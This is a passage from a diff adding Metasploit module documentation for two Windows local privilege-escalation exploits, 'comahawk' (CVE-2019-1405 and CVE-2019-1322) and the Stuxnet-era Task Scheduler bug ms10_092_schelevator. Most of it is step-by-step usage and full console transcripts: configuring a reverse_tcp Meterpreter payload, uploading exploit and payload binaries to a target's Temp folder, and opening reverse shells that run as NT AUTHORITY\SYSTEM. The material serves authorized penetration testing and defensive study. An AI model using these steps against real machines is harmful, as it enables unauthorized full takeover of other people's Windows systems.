+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-D1E425Q\msfuser
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+```

documentation/modules/exploit/windows/local/comahawk.md

@@ -0,0 +1,110 @@
+## Introduction
+
+This leverages two vulnerabilities on specific builds of Windows 10 to
+move from an authenticated user of any level to NT AUTHORITY\LOCAL SERVICE
+and then from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
+The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to
+NT AUTHORITY\LOCAL SERVICE
+The second (CVE-2019-1322) leverages the Update Orchestrator Service to
+elevate from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
+
+The exploit works by creating a new service, so the exploit may take
+up to minute on test systems, and may take longer in the wild.  Adjusting
+the exploit_timeout value in the datastore.
+
+## Usage
+
+1. Create a session on the target system under the context of an authenticated user.
+2. Begin interacting with the module: `use exploit/windows/local/comahawk`.
+3. Set the `PAYLOAD` and configure it correctly.
+4. If an existing handler is configured to receive the elevated session, then the module's
+   handler should be disabled: `set DisablePayloadHandler true`.
+5. Make sure that the `SESSION` value is set to the existing session identifier.
+6. Invoke the module: `run`.
+
+## Scenario
+
+### Windows 10 (10.0 Build 17134) x64
+
+```
+[*] Meterpreter session 1 opened (192.168.135.168:5555 -> 192.168.132.125:49674) at 2019-12-11 18:33:09 -0600
+
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-D1E425Q\msfuser
+meterpreter > getsystem
+[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
+[-] Named Pipe Impersonation (In Memory/Admin)
+[-] Named Pipe Impersonation (Dropper/Admin)
+[-] Token Duplication (In Memory/Admin)
+meterpreter > background
+[*] Backgrounding session 1...
+msf5 exploit(multi/handler) > use exploit/windows/local/comahawk 
+msf5 exploit(windows/local/comahawk) > set versbose true
+versbose => true
+msf5 exploit(windows/local/comahawk) > set session 1
+session => 1
+msf5 exploit(windows/local/comahawk) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(windows/local/comahawk) > set lhost 192.168.135.168
+lhost => 192.168.135.168
+msf5 exploit(windows/local/comahawk) > show options
+
+Module options (exploit/windows/local/comahawk):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   EXECUTE_DELAY    3                yes       The number of seconds to delay between file upload and exploit launch
+   EXPLOIT_NAME                      no        The filename to use for the exploit binary (%RAND% by default).
+   EXPLOIT_TIMEOUT  60               yes       The number of seconds to wait for exploit to finish running
+   PAYLOAD_NAME                      no        The filename for the payload to be used on the target host (%RAND%.exe by default).
+   SESSION          1                yes       The session to run this module on.
+   WRITABLE_DIR                      no        Path to write binaries (%TEMP% by default).
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows x64
+
+
+msf5 exploit(windows/local/comahawk) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4444 
+[*] Attempting to PrivEsc on DESKTOP-D1E425Q via session ID: 1
+[*] Exploit uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\TcpHnwmv.exe
+[*] Payload (7168 bytes) uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\EubQLoJJbPMX.exe
+[*] It may take a moment after the session is established for the exploit to exit safely.
+[*] Sending stage (206403 bytes) to 192.168.132.125
+[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49679) at 2019-12-11 18:35:35 -0600
+
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+
+```

documentation/modules/exploit/windows/local/ms10_092_schelevator.md

@@ -0,0 +1,51 @@
+## Vulnerable Application
+
+This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
+
+## Scenarios
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/exploits/windows/local/ms10_092_schelevator`
+3. Do: `set SESSION [#]`
+4. Do: `run`
+
+### A run on Windows Vista (Build 6000) and Kali Linux 2019.3
+
+  ```
+  msf > use modules/exploits/windows/local/ms10_092_schelevator
+  msf exploit(windows/local/ms10_092_schelevator) > set SESSION 1
+    SESSION => 1
+  msf5 exploit(windows/local/ms10_092_schelevator) > run  
+    [*] Started reverse TCP handler on 192.168.1.3:4444
+    [*] Preparing payload at C:\Users\test\AppData\Local\Temp\CItOOtB.exe
+    [*] Creating task: TzAZ6H4K
+    [*] SUCCESS: The scheduled task "TzAZ6H4K" has successfully been created.
+    [*] SCHELEVATOR
+    [*] Reading the task file contents from C:\Windows\system32\tasks\TzAZ6H4K...
+    [*] Original CRC32: 0x69b1db25
+    [*] Final CRC32: 0x69b1db25
+    [*] Writing our modified content back...
+    [*] Validating task: TzAZ6H4K
+    [*]
+    [*] Folder: \
+    [*] TaskName                                   Next Run Time        Status
+    [*] ========================================== ==================== ===============
+    [*] TzAZ6H4K                                   12/1/2019 10:41:00 A Ready
+    [*] SCHELEVATOR
+    [*] Disabling the task...
+    [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
+    [*] SCHELEVATOR
+    [*] Enabling the task...
+    [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
+    [*] SCHELEVATOR
+    [*] Executing the task...
+    [*] Sending stage (180291 bytes) to 192.168.1.2
+    [*] SUCCESS: Attempted to run the scheduled task "TzAZ6H4K".
+    [*] SCHELEVATOR
+    [*] Deleting the task...
+    [*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.2:49249) at 2019-11-27 10:42:02 -0700
+    [*] SUCCESS: The scheduled task "TzAZ6H4K" was successfully deleted.
+    [*] SCHELEVATOR
+  ```